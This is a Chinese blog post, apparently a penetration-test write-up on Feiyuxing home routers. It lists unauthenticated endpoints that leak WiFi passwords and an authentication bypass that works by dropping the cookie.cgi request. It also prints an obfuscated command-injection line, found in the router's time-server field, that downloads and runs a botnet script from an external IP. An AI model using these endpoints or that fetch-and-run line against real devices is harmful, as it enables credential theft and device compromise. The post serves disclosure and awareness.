【渗透实战系列】飞鱼星家庭路由器越权发现的木马传播事件

已于 2023-06-19 09:06:36 修改
阅读量1k 收藏 3
点赞数 2
分类专栏: 渗透测试 文章标签: web安全
于 2023-06-15 17:58:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hellohahi/article/details/131232791
版权

一、前言

事情是这样,最近这段时间收到一次应急,据说是路由器中毒了访问了挖矿域名,后面看了一下后还是因为NAT原因导致的。不过因为这起事件勾起了我对家庭路由器漏洞利用兴趣,于是就有了这篇文章的诞生。

二、飞鱼星家庭智能路由器yi

这次是用“飞鱼星家庭智能路由器”来做的测试!

2.1 漏洞资产

title="飞鱼星家用智能路由"

2.2 未授权访问

/request_para.cgi?parameter=wifi_info          #获取 WIFI账号密码
/request_para.cgi?parameter=wifi_get_5g_host   #获取5GWIFI账号密码
/request_para.cgi?parameter=wifi_get_2g_host   #获取2GWIFI账号密码

2.3 越权登录

步骤:访问index.html,然后⽤burp抓包drop掉cookie.cgi这个包。

1).访问index.html页面。
在这里插入图片描述

在这里插入图片描述
2).使用burp drop掉cookie.cgi的请求包
在这里插入图片描述
3).成功越权登录到后台的管理界面。
在这里插入图片描述

2.3 发现僵尸木马传播下载事件

Tips:这里是在越权测试过程中,发现在【系统设置】-【高级】的时间服务器地址这里发现存在木马脚本下载代码。
在这里插入图片描述完整代码如下,就放这里了:

`cd${IFS}../;cd${IFS}/tmp/;wget${IFS}http://95.214.27.53/download.sh;curl${IFS}-O${IFS}http://95.214.27.53/download.sh;sh${IFS}download.sh`

至此,这次家庭路由器的测试就到这里了。这些漏洞的利用基本上都很简单,至于后面发现的僵尸网络下载传播事件,倒是一个意外的收获,这次事件也告诫各位师傅,自己的小路由器可别直接通过公网IP连互联网哦!
不过现在的家庭宽带好像都是运营商的光猫来拨号,小路由器就用来释放WiFi信号用,起码我这是这样。

山上的云朵
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞复现】飞鱼路由器COOKIE.CGI权限绕过漏洞
晚风不及你
02-06 649
成都飞鱼科技股份有限公司是服务于企业、商业和家庭用户,提供智能易用的网络通讯管理设备与创新科技的增值服务。
飞鱼 企业级智能上网行为管理系统 权限绕过信息泄露漏洞
失心少年
06-27 988
飞鱼 企业级智能上网行为管理系统 存在权限绕过以及信息泄露漏洞,可以获取管理员权限以及用户密码。其中使用Burp Durp 掉 cookie.cgi 请求包。title=“飞鱼企业级智能上网行为管理系统”飞鱼 企业级智能上网行为管理系统。访问主页使用Burp抓包。
飞鱼企业级智能上网行为管理系统 越权漏洞
m0_49025459的博客
01-31 862
飞鱼企业级智能无线上网行为管理系统以及众多产品存在权限绕过漏洞 漏洞分类:逻辑漏洞 影响版本:全版本
飞鱼路由器 越权漏洞【漏洞复现】
m0_64366018的博客
01-26 930
丢掉包后,就可以越权
【漏洞复现】飞鱼企业级智能上网行为管理系统​ send_order.cgi 前台RCE漏洞
qq_34780861的博客
03-21 505
飞鱼上网行为管理系统企业版前台RCE,攻击者可通过此漏洞获取服务器权限。
手机没Root?你照样可以渗透路由器
weixin_34191734的博客
08-15 1031
和Metasploit差不多,RouterSploit是一个强大的漏洞利用框架,用于快速识别和利用路由器中的普通漏洞,它还有个亮点,就是可以在绝大多数安卓设备上运行。 如果你想在电脑上运行,可以阅读这篇文章,而这篇教程则会告诉你如何轻松地在未Root的安卓设备上安装RouterSploit,这样一来,只要你的智能手机可以连接这些有漏洞的路由器,你就可以渗透他们。 RouterSploit vs 路...
飞鱼路由器怎么设置PPPOE拨号上网?
10-01
飞鱼路由器怎么设置PPPOE拨号上网?飞鱼路由器想要设置上网该怎么设置呢?下面我们就来看看飞鱼路由器设置PPPOE的教程,需要的朋友可以参考下
飞鱼 VE982W 路由器功能设置图文详解
10-01
飞鱼VE982W路由器是一款专为中小企业设计的全能网管设备,具备丰富的功能,既能满足基本的网络连接需求,又能实现精细化的网络管理。以下是对这款路由器功能设置的详细解读: **1. 基础功能设置** 基础功能主要...
飞鱼路由器的故障按步骤排除
10-02
飞鱼路由器作为网络连接的关键设备,其稳定性和性能直接影响着整个网络的运作。当遇到故障时,系统化的故障排除步骤至关重要。以下是一些具体的排查方法: 首先,要对路由器的运行状态进行初步判断。当路由器出现...
飞鱼路由器的网速变慢之迷的解决
10-01
做为高端路由器飞鱼路由基本都使用在大型企业、政府机构等网络,网络故障在局域网中是在所难免的,最重要的是快速隔离或排除故障,当然造成各种故障的原因有很多种,想要了解的可以参考思科路由器配置,这里为...
WireShark黑客发现之旅(8)—针对路由器的Linux木马
weixin_33750452的博客
03-08 748
聚锋实验室 · 2016/04/25 10:24Author:Mr.Right、Gongmo申明:文中提到的攻击方式仅为曝光、打击恶意网络攻击行为,切勿模仿,否则后果自负。0x00 前言路由器木马,其主要目标是控制网络的核心路由设备;一旦攻击成功,其危害性远大于一台主机被控。如果仅仅在路由器上面防范该类木马,那也是不够的,有很多Linux服务器违规开放Telnet端口,且使用了弱口令,一样可以中招...
记一次渗透测试某路由器
weixin_30872157的博客
04-26 1115
开局一个路由器渗透全靠莽,漏洞全靠猜!简单记录一下~ 某个厂商的路由器,网上找不到该型号路由器的相关资料,固件也搜索不出来! 插上网线,连接到路由器,获得路由器地址,放弃常规的从web管理界面开始的套路,先查看开放的端口信息如下: ssh端口开放,测试发现存在用户名枚举漏洞,存在用户root,爆破也没有什么结果: ssh登录提示警告,登录禁止,所以就算爆破出来密码也没啥...
路由渗透和路由泄露
weixin_65551798的博客
07-11 1191
因为没有路由泄露之前,r1去往r4的时候是从上面开销值比较大的地方走,但是这个路由表中,不仅有开始的默认路由,现在又多了一些明细路由,虽说路由泄露进来的路由能够感知cost,但是比默认路由小但是,,因为最长掩码匹配原则,他会选择掩码比较长的那一个。因为在r2和r3上都做了路由过滤,在路由过滤调用的acl中,只允许了去往10.0.234.0网段的路由,并且在路由协议上调用acl,在下面默认有一条拒绝所有,所以路由表里面只有这一条路由。但是因为路由泄露把骨干区域所有的路由都进行传递进来了,安全性大度降低。
路由器漏洞挖掘之 DIR-805L 越权文件读取漏洞分析
abc380620175的博客
04-24 462
接下来的文章都会实战复现一些关于路由器的 web /二进制漏洞,可能会写的比较细,希望能给大家带来启发。 若这里图片显示不出来可以试试挂个梯子。 前言 本文在复现 DIR-805L 任意文件读取漏洞时,将会比较详细的分析一下用于 cgi 处理的 phpcgi_main 函数其中的一些功能。在逆向 cgibin 二进制文件时,常常会遇到一些用于解析 http 请求的函数,在分析时经常对...
实战!入侵隔壁家WiFi与获取路由器管理权!
热门推荐
sumkee911‘s coding
11-14 6万+
大家好,今天是网络安全的话题,内容很入门,高手可以直接跳过。 本文章只供大家学习之用,请不要以身试法,否则后果自负。   1.获取WiFi密码 首先我们要获取WiFi密码,需要用到一张无线网卡(本人用RT3070)、Aircrack-ng工具、密码字典。 Aircrack-ng下载地址:http://www.aircrack-ng.org/ 密码字典下载地址:链接: https://p...
【复现】飞鱼上网行为管理系统RCE漏洞_67
最新发布
fushuang333的博客
04-03 646
【复现】飞鱼上网行为管理系统RCE漏洞,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。继承Web服务器程序的权限,去执行系统命令,控制整个服务器。
无线渗透|Wi-Fi渗透思路
zkaqlaoniao的博客
10-30 231
对于WPA2 WPA3的一些渗透思路1.WPA2:是WPA的升级版,是针对保护无线网络安全而设计的无线网络保护系统,引入了PSK(预共享密钥模式)秘钥,加强了WPA的不足之处,但是因为使用了PSK,所以只要攻击者知晓目标的PSK秘钥,就能十分轻易加入无线网络。2.WPA3:是近几年新出现的无线网络安全保护系统,在WPA2的基础上实现了针对字典法暴力密码破解的难度,如果失败次数过多,AP将直接锁定攻击行为,以及取代了PSK使用对等实体验证(SAE)。
无线WiFi安全渗透与防御(一):初识无线安全
hack0919的博客
04-15 1439
无线网络的搭建比较简单,只需要一个无线路由器即可实现

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值